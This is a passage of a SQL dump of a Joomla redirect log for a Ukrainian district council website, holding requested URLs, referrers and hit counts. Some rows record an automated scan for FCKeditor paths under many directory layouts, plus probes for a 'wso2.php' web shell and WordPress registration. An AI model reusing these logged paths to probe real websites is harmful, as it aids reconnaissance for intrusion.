00:00:00',301),(12526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&Itemid=14&lang=ru','','','',1,0,'2015-03-11 14:44:55','0000-00-00 00:00:00',301),(12527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&lang=en','','','',1,0,'2015-03-11 14:47:05','0000-00-00 00:00:00',301),(12528,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&Itemid=14&lang=ru','','','',1,0,'2015-03-11 14:47:08','0000-00-00 00:00:00',301),(12529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&lang=ru','','','',1,0,'2015-03-11 14:47:10','0000-00-00 00:00:00',301),(12530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&Itemid=14&lang=ru','','','',1,0,'2015-03-11 14:47:17','0000-00-00 00:00:00',301),(12531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&Itemid=14&lang=uk','','','',1,0,'2015-03-11 14:47:18','0000-00-00 00:00:00',301),(12532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&Itemid=14&lang=en','','','',1,0,'2015-03-11 14:47:20','0000-00-00 00:00:00',301),(12533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59:--20062014-&Itemid=107&lang=ru','','','',2,0,'2015-03-11 15:00:57','0000-00-00 00:00:00',301),(12534,'http://malyn-rayrada.org.ua/index.php/1007-malinski-podatkivtsi-zaproshuyut-na-seminar?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-03-11 20:11:05','0000-00-00 00:00:00',301),(12535,'http://www.malyn-rayrada.org.ua/services/img/texts','','','',2,0,'2015-03-11 22:40:19','0000-00-00 00:00:00',301),(12536,'http://www.malyn-rayrada.org.ua/services/img/librivoxaudio','','','',2,0,'2015-03-11 22:40:19','0000-00-00 00:00:00',301),(12537,'http://www.malyn-rayrada.org.ua/services/img/tv','','','',2,0,'2015-03-11 22:40:19','0000-00-00 00:00:00',301),(12538,'http://www.malyn-rayrada.org.ua/services/img/etree','','','',2,0,'2015-03-11 22:40:19','0000-00-00 00:00:00',301),(12539,'http://www.malyn-rayrada.org.ua/services/img/internetarcade','','','',2,0,'2015-03-11 22:40:19','0000-00-00 00:00:00',301),(12540,'http://www.malyn-rayrada.org.ua/services/img/consolelivingroom','','','',1,0,'2015-03-11 22:40:35','0000-00-00 00:00:00',301),(12541,'http://www.malyn-rayrada.org.ua/services/img/brooklynmuseum','','','',1,0,'2015-03-11 22:40:35','0000-00-00 00:00:00',301),(12542,'http://www.malyn-rayrada.org.ua/services/img/metropolitanmuseumofart-gallery','','','',1,0,'2015-03-11 22:40:36','0000-00-00 00:00:00',301),(12543,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1323:2014-05-27-13-21-50&lang=uk&option=com_content&view=article','','','',1,0,'2015-03-12 14:39:24','0000-00-00 00:00:00',301),(12544,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1081:-2013-2017-&lang=ru&option=com_content&view=article','','','',6,0,'2015-03-12 20:50:46','0000-00-00 00:00:00',301),(12545,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1358:2014-07-07-08-11-22&lang=ru&option=com_content&view=article','','','',2,0,'2015-03-13 12:43:27','0000-00-00 00:00:00',301),(12546,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1296:116---&lang=ru&option=com_content&view=article','','','',4,0,'2015-03-16 03:15:02','0000-00-00 00:00:00',301),(12547,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1284:2014-04-17-13-00-18&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%B2%D1%96%D1%82%D0%B0%D0%BD%D0%BD%D1%8F%20%D1%96%D0%B7%20%D1%81%D0%B2%D1%96%D1%82%D0%BB%D0%B8%D0%BC%20%D1%81%D0%B2%D1%8F','',6,0,'2015-03-16 12:48:31','0000-00-00 00:00:00',301),(12548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&Itemid=47&lang=ru','','','',1,0,'2015-03-17 16:50:15','0000-00-00 00:00:00',301),(12549,'http://www.malyn-rayrada.org.ua/index.php?Itemid=108&catid=60:--11072014-&id=1364:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-03-17 17:06:51','0000-00-00 00:00:00',301),(12550,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1047:2013-07-10-05-51-36&lang=uk&option=com_content&view=article','','','',1,0,'2015-03-19 16:22:27','0000-00-00 00:00:00',301),(12551,'http://www.malyn-rayrada.org.ua/wp-login.php?action=register','','','',1,0,'2015-03-20 12:01:10','0000-00-00 00:00:00',301),(12552,'http://www.malyn-rayrada.org.ua/HTMLEditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:05','0000-00-00 00:00:00',301),(12553,'http://www.malyn-rayrada.org.ua/Backend/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:08','0000-00-00 00:00:00',301),(12554,'http://www.malyn-rayrada.org.ua/admin/classes/components/formattedTextArea/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:11','0000-00-00 00:00:00',301),(12555,'http://www.malyn-rayrada.org.ua/news_script/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:14','0000-00-00 00:00:00',301),(12556,'http://www.malyn-rayrada.org.ua/admin/view/javascript/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:18','0000-00-00 00:00:00',301),(12557,'http://www.malyn-rayrada.org.ua/wp-content/plugins/chenpress/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:21','0000-00-00 00:00:00',301),(12558,'http://www.malyn-rayrada.org.ua/wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:24','0000-00-00 00:00:00',301),(12559,'http://www.malyn-rayrada.org.ua/community/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:27','0000-00-00 00:00:00',301),(12560,'http://www.malyn-rayrada.org.ua/scripts/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:30','0000-00-00 00:00:00',301),(12561,'http://www.malyn-rayrada.org.ua/assets/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:33','0000-00-00 00:00:00',301),(12562,'http://www.malyn-rayrada.org.ua/main/inc/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:36','0000-00-00 00:00:00',301),(12563,'http://www.malyn-rayrada.org.ua/php/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:39','0000-00-00 00:00:00',301),(12564,'http://www.malyn-rayrada.org.ua/register/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:42','0000-00-00 00:00:00',301),(12565,'http://www.malyn-rayrada.org.ua/admin/includes/rte/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:45','0000-00-00 00:00:00',301),(12566,'http://www.malyn-rayrada.org.ua/CFIDE/scripts/ajax/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:48','0000-00-00 00:00:00',301),(12567,'http://www.malyn-rayrada.org.ua/fckeditor/jscripts/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:51','0000-00-00 00:00:00',301),(12568,'http://www.malyn-rayrada.org.ua/inurl-/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:54','0000-00-00 00:00:00',301),(12569,'http://www.malyn-rayrada.org.ua/pub/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:53:57','0000-00-00 00:00:00',301),(12570,'http://www.malyn-rayrada.org.ua/Manage/Include/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:00','0000-00-00 00:00:00',301),(12571,'http://www.malyn-rayrada.org.ua/public/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:03','0000-00-00 00:00:00',301),(12572,'http://www.malyn-rayrada.org.ua/asetrack/includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:06','0000-00-00 00:00:00',301),(12573,'http://www.malyn-rayrada.org.ua/js/krte/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:09','0000-00-00 00:00:00',301),(12574,'http://www.malyn-rayrada.org.ua/wp-content/plugins/wp-insert/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:12','0000-00-00 00:00:00',301),(12575,'http://www.malyn-rayrada.org.ua/fckphp/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:16','0000-00-00 00:00:00',301),(12576,'http://www.malyn-rayrada.org.ua/site/modules/fckeditor/fckeditor.html','','','',1,0,'2015-03-23 06:54:20','0000-00-00 00:00:00',301),(12577,'http://www.malyn-rayrada.org.ua/AWT/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:22','0000-00-00 00:00:00',301),(12578,'http://www.malyn-rayrada.org.ua/admin/produtos/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:27','0000-00-00 00:00:00',301),(12579,'http://www.malyn-rayrada.org.ua/fronteiranorte/editor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:29','0000-00-00 00:00:00',301),(12580,'http://www.malyn-rayrada.org.ua/app/webroot/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:32','0000-00-00 00:00:00',301),(12581,'http://www.malyn-rayrada.org.ua/cart/admin/htmleditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:35','0000-00-00 00:00:00',301),(12582,'http://www.malyn-rayrada.org.ua/paginas/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:38','0000-00-00 00:00:00',301),(12583,'http://www.malyn-rayrada.org.ua/util/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:42','0000-00-00 00:00:00',301),(12584,'http://www.malyn-rayrada.org.ua/extensions/FCKeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:45','0000-00-00 00:00:00',301),(12585,'http://www.malyn-rayrada.org.ua/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:49','0000-00-00 00:00:00',301),(12586,'http://www.malyn-rayrada.org.ua/blog/admin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:52','0000-00-00 00:00:00',301),(12587,'http://www.malyn-rayrada.org.ua/classifieds/submit/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:55','0000-00-00 00:00:00',301),(12588,'http://www.malyn-rayrada.org.ua/data/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:54:57','0000-00-00 00:00:00',301),(12589,'http://www.malyn-rayrada.org.ua/adminweb/util/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:00','0000-00-00 00:00:00',301),(12590,'http://www.malyn-rayrada.org.ua/jsincludes/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:03','0000-00-00 00:00:00',301),(12591,'http://www.malyn-rayrada.org.ua/modules/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:06','0000-00-00 00:00:00',301),(12592,'http://www.malyn-rayrada.org.ua/resources/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:09','0000-00-00 00:00:00',301),(12593,'http://www.malyn-rayrada.org.ua/common/htmlarea/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:12','0000-00-00 00:00:00',301),(12594,'http://www.malyn-rayrada.org.ua/library/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:15','0000-00-00 00:00:00',301),(12595,'http://www.malyn-rayrada.org.ua/multicms/packages/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:18','0000-00-00 00:00:00',301),(12596,'http://www.malyn-rayrada.org.ua/administrator/php/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:21','0000-00-00 00:00:00',301),(12597,'http://www.malyn-rayrada.org.ua/plugins/HTMLeditor/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:24','0000-00-00 00:00:00',301),(12598,'http://www.malyn-rayrada.org.ua/html/proudphufah/admin/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:27','0000-00-00 00:00:00',301),(12599,'http://www.malyn-rayrada.org.ua/js/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:30','0000-00-00 00:00:00',301),(12600,'http://www.malyn-rayrada.org.ua/javascripts/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:34','0000-00-00 00:00:00',301),(12601,'http://www.malyn-rayrada.org.ua/joomla/Medkorp/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:37','0000-00-00 00:00:00',301),(12602,'http://www.malyn-rayrada.org.ua/assets/includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:40','0000-00-00 00:00:00',301),(12603,'http://www.malyn-rayrada.org.ua/v1/plugins/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:44','0000-00-00 00:00:00',301),(12604,'http://www.malyn-rayrada.org.ua/core/php/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:49','0000-00-00 00:00:00',301),(12605,'http://www.malyn-rayrada.org.ua/db/include/class/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:55:53','0000-00-00 00:00:00',301),(12606,'http://www.malyn-rayrada.org.ua/dhtml_editor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:56:08','0000-00-00 00:00:00',301),(12607,'http://www.malyn-rayrada.org.ua/blogscript/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:56:11','0000-00-00 00:00:00',301),(12608,'http://www.malyn-rayrada.org.ua/gallery/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:56:14','0000-00-00 00:00:00',301),(12609,'http://www.malyn-rayrada.org.ua/control/editor/fckeditor.html','','','',1,0,'2015-03-23 06:56:18','0000-00-00 00:00:00',301),(12610,'http://www.malyn-rayrada.org.ua/gateweb/scripts/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:56:21','0000-00-00 00:00:00',301),(12611,'http://www.malyn-rayrada.org.ua/static/scripts/ajax/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-23 06:56:26','0000-00-00 00:00:00',301),(12612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&Itemid=14&lang=en','','','',3,0,'2015-03-23 07:54:51','0000-00-00 00:00:00',301),(12613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-03-24 05:42:37','0000-00-00 00:00:00',301),(12614,'http://www.malyn-rayrada.org.ua/index.php?option=com_vitabook','','','',32,0,'2015-03-24 13:11:42','0000-00-00 00:00:00',301),(12615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&lang=ru','','','',2,0,'2015-03-26 00:04:35','0000-00-00 00:00:00',301),(12616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58&Itemid=105&lang=ru','','','',1,0,'2015-03-26 04:27:32','0000-00-00 00:00:00',301),(12617,'http://www.malyn-rayrada.org.ua/index.php/1043-svyatkova-aktsiya-do-velikodnikh-svyat','','','',4,0,'2015-03-26 16:06:32','0000-00-00 00:00:00',301),(12618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&Itemid=14&lang=ru','','','',2,0,'2015-03-27 11:21:42','0000-00-00 00:00:00',301),(12619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&lang=en&Itemid=','','','',1,0,'2015-03-27 17:49:31','0000-00-00 00:00:00',301),(12620,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/778-informacija-st-vorob-ivskoi-silskoi-radi','','','',18,0,'2015-03-28 02:29:34','0000-00-00 00:00:00',301),(12621,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/792-informacija-lukivskoi-silskoi-radi','','','',140,0,'2015-03-29 00:40:34','0000-00-00 00:00:00',301),(12622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=777:2012-10-02-10-06-36&catid=45&Itemid=84&lang=uk','','','',10,0,'2015-03-31 08:33:19','0000-00-00 00:00:00',301),(12623,'http://www.malyn-rayrada.org.ua/+','','','',2,0,'2015-03-31 12:11:45','0000-00-00 00:00:00',301),(12624,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/755-informacija-morozivskoi-silskoi-radi','','','',18,0,'2015-03-31 12:16:51','0000-00-00 00:00:00',301),(12625,'http://www.malyn-rayrada.org.ua/index.php/1028-vitaemo-iz-svyatom-vesni?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-03-31 20:05:25','0000-00-00 00:00:00',301),(12626,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/787-informue-gorinska-silska-rada','','','',131,0,'2015-04-01 01:04:23','0000-00-00 00:00:00',301),(12627,'http://malyn-rayrada.org.ua/wso2.php','','','',3,0,'2015-04-01 08:48:12','0000-00-00 00:00:00',301),(12628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45&Itemid=84&lang=uk','','','',8,0,'2015-04-02 10:59:48','0000-00-00 00:00:00',301),(12629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=ru','','','',4,0,'2015-04-02 11:40:53','0000-00-00 00:00:00',301),(12630,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1228:2014-02-27-14-42-41&lang=ru&option=com_content&view=article','','','',1,0,'2015-04-02 17:46:49','0000-00-00 00:00:00',301),(12631,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=en','','','',1,0,'2015-04-03 00:54:11','0000-00-00 00:00:00',301),(12632,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=ru','','','',3,0,'2015-04-03 00:54:15','0000-00-00 00:00:00',301),(12633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=ru','','','',6,0,'2015-04-03 19:43:26','0000-00-00 00:00:00',301),(12634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=778:2012-10-03-08-53-07&catid=45&Itemid=84&lang=uk','','','',6,0,'2015-04-04 03:13:32','0000-00-00 00:00:00',301),(12635,'http://www.malyn-rayrada.org.ua/index.php/984-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-postijnikh-komisij?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-04-04 04:15:37','0000-00-00 00:00:00',301),(12636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&Itemid=14&lang=en','','','',8,0,'2015-04-04 06:57:29','0000-00-00 00:00:00',301),(12637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=en&Itemid=','','','',5,0,'2015-04-05 05:02:48','0000-00-00 00:00:00',301),(12638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38:--19122011-&Itemid=73&lang=ru','','','',15,0,'2015-04-05 09:21:46','0000-00-00 00:00:00',301),(12639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33&Itemid=66&lang=en','','','',2,0,'2015-04-05 10:35:52','0000-00-00 00:00:00',301),(12640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-04-05 10:47:32','0000-00-00 00:00:00',301),(12641,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',37,0,'2015-04-05 13:18:45','0000-00-00 00:00:00',301),(12642,'http://www.malyn-rayrada.org.ua/index.php/480-pro-sklikannja-19-pozachergovoi-sesii-rajonnoi','','','',50,0,'2015-04-05 13:27:50','0000-00-00 00:00:00',301),(12643,'http://www.malyn-rayrada.org.ua/index.php/411-reforma-z-jakoju-ukraina-zapiznjuetsja-na-20-rokiv','','','',39,0,'2015-04-05 14:34:36','0000-00-00 00:00:00',301),(12644,'http://www.malyn-rayrada.org.ua/index.php/1064-khristiyani-svyatkuyut-verbnu-nedilyu-katoliki-velikden','','','',9,0,'2015-04-05 15:12:42','0000-00-00 00:00:00',301),(12645,'http://www.malyn-rayrada.org.ua/index.php/1064-khristiyani-svyatkuyut-verbnu-nedilyu-katoliki-velikden?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-05 15:53:51','0000-00-00 00:00:00',301),(12646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38:--19122011-&Itemid=73&lang=uk','','','',19,0,'2015-04-05 16:04:38','0000-00-00 00:00:00',301),(12647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37&Itemid=72&lang=uk','','','',99,0,'2015-04-05 17:46:50','0000-00-00 00:00:00',301),(12648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',12,0,'2015-04-05 18:37:00','0000-00-00 00:00:00',301),(12649,'http://www.malyn-rayrada.org.ua/index.php/438-uvaga-upravlinnja-pfu-v-malinskomu-rajoni-informue','','','',45,0,'2015-04-05 21:33:15','0000-00-00 00:00:00',301),(12650,'http://www.malyn-rayrada.org.ua/index.php/297-startuvala-vstupna-kampanija','','','',53,0,'2015-04-05 22:04:51','0000-00-00 00:00:00',301),(12651,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=777:2012-10-02-10-06-36&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-04-05 23:03:07','0000-00-00 00:00:00',301),(12652,'http://www.malyn-rayrada.org.ua/index.php/763-nachalnik-mrv-kvi-ivan-levchenko-informue','','','',108,0,'2015-04-05 23:58:08','0000-00-00 00:00:00',301),(12653,'http://www.malyn-rayrada.org.ua/index.php/526-do-vidoma-vipusknikiv-shkil-opublikovanij-rejting','','','',24,0,'2015-04-06 00:23:11','0000-00-00 00:00:00',301),(12654,'http://www.malyn-rayrada.org.ua/index.php/809-upravlinnja-finansiv-rajderzhadministracii','','','',43,0,'2015-04-06 00:51:04','0000-00-00 00:00:00',301),(12655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38&Itemid=73&lang=uk','','','',8,0,'2015-04-06 01:23:40','0000-00-00 00:00:00',301),(12656,'http://www.malyn-rayrada.org.ua/index.php/405-obgovoreno-pitannja-zabezpechennja-zhiteliv','','','',26,0,'2015-04-06 04:22:20','0000-00-00 00:00:00',301),(12657,'http://www.malyn-rayrada.org.ua/index.php/527-taka-pogoda-prognozuetsja-do-kincja-tizhnja','','','',43,0,'2015-04-06 04:23:58','0000-00-00 00:00:00',301),(12658,'http://www.malyn-rayrada.org.ua/index.php/478-do-vidoma-deputativ-rajonnoi-radi','','','',7,0,'2015-04-06 04:33:10','0000-00-00 00:00:00',301),(12659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33&Itemid=66&lang=uk','','','',14,0,'2015-04-06 08:05:20','0000-00-00 00:00:00',301),(12660,'http://www.malyn-rayrada.org.ua/index.php/848-nachalnik-upravlinnja-derzhzemagentstva-u','','','',15,0,'2015-04-06 09:07:22','0000-00-00 00:00:00',301),(12661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16&Itemid=39&lang=en','','','',5,0,'2015-04-06 09:34:07','0000-00-00 00:00:00',301),(12662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16&Itemid=39&lang=ru','','','',3,0,'2015-04-06 09:34:09','0000-00-00 00:00:00',301),(12663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=277:-2010-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=en','','','',5,0,'2015-04-06 09:34:12','0000-00-00 00:00:00',301),(12664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43&Itemid=82&lang=en','','','',2,0,'2015-04-06 09:35:02','0000-00-00 00:00:00',301),(12665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-04-06 09:35:05','0000-00-00 00:00:00',301),(12666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44&Itemid=83&lang=ru','','','',1,0,'2015-04-06 09:35:14','0000-00-00 00:00:00',301),(12667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=757:2012-09-12-09-47-49&catid=44&Itemid=83&lang=uk','','','',9,0,'2015-04-06 09:35:18','0000-00-00 00:00:00',301),(12668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-04-06 09:35:21','0000-00-00 00:00:00',301),(12669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45&Itemid=84&lang=uk','','','',11,0,'2015-04-06 09:35:24','0000-00-00 00:00:00',301),(12670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45:--14112012-&Itemid=84&lang=en','','','',4,0,'2015-04-06 09:35:28','0000-00-00 00:00:00',301),(12671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45&Itemid=84&lang=uk','','','',9,0,'2015-04-06 09:35:37','0000-00-00 00:00:00',301),(12672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2015-04-06 09:35:41','0000-00-00 00:00:00',301),(12673,'http://www.malyn-rayrada.org.ua/index.php/403-verhovna-rada-vidklala-na-rik-nabuttja-chinnosti','','','',114,0,'2015-04-06 10:50:54','0000-00-00 00:00:00',301),(12674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=uk','','','',28,0,'2015-04-06 12:33:24','0000-00-00 00:00:00',301),(12675,'http://www.malyn-rayrada.org.ua/index.php/529-propozicii-shhodo-zmini-sistemi-miscevih-viboriv','','','',15,0,'2015-04-06 12:34:02','0000-00-00 00:00:00',301),(12676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=529:2012-01-05-19-10-35&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-04-06 12:34:02','0000-00-00 00:00:00',301),(12677,'http://www.malyn-rayrada.org.ua/index.php/882-pro-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-serpen-2014-roku','','','',37,0,'2015-04-06 14:09:09','0000-00-00 00:00:00',301),(12678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38&Itemid=73&lang=uk','','','',56,0,'2015-04-06 18:23:34','0000-00-00 00:00:00',301),(12679,'http://www.malyn-rayrada.org.ua/index.php/498-vidbulas-18-sesija-rajonnoi-radi','','','',16,0,'2015-04-06 20:59:54','0000-00-00 00:00:00',301),(12680,'http://www.malyn-rayrada.org.ua/index.php/326-pro-sklikannja-14-sesii-rajonnoi-radi-6-sklikannja','','','',32,0,'2015-04-06 22:14:28','0000-00-00 00:00:00',301),(12681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=uk','','','',5,0,'2015-04-07 00:34:25','0000-00-00 00:00:00',301),(12682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38:--19122011-&Itemid=73&lang=uk','','','',48,0,'2015-04-07 00:45:08','0000-00-00 00:00:00',301),(12683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45&Itemid=84&lang=uk','','','',4,0,'2015-04-07 02:58:59','0000-00-00 00:00:00',301),(12684,'http://www.malyn-rayrada.org.ua/index.php/300-borgi-potribno-splachuvati','','https://www.google.com.ua/','',54,0,'2015-04-07 06:10:07','0000-00-00 00:00:00',301),(12685,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=778:2012-10-03-08-53-07&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-04-07 07:39:28','0000-00-00 00:00:00',301),(12686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=uk','','','',8,0,'2015-04-07 09:16:48','0000-00-00 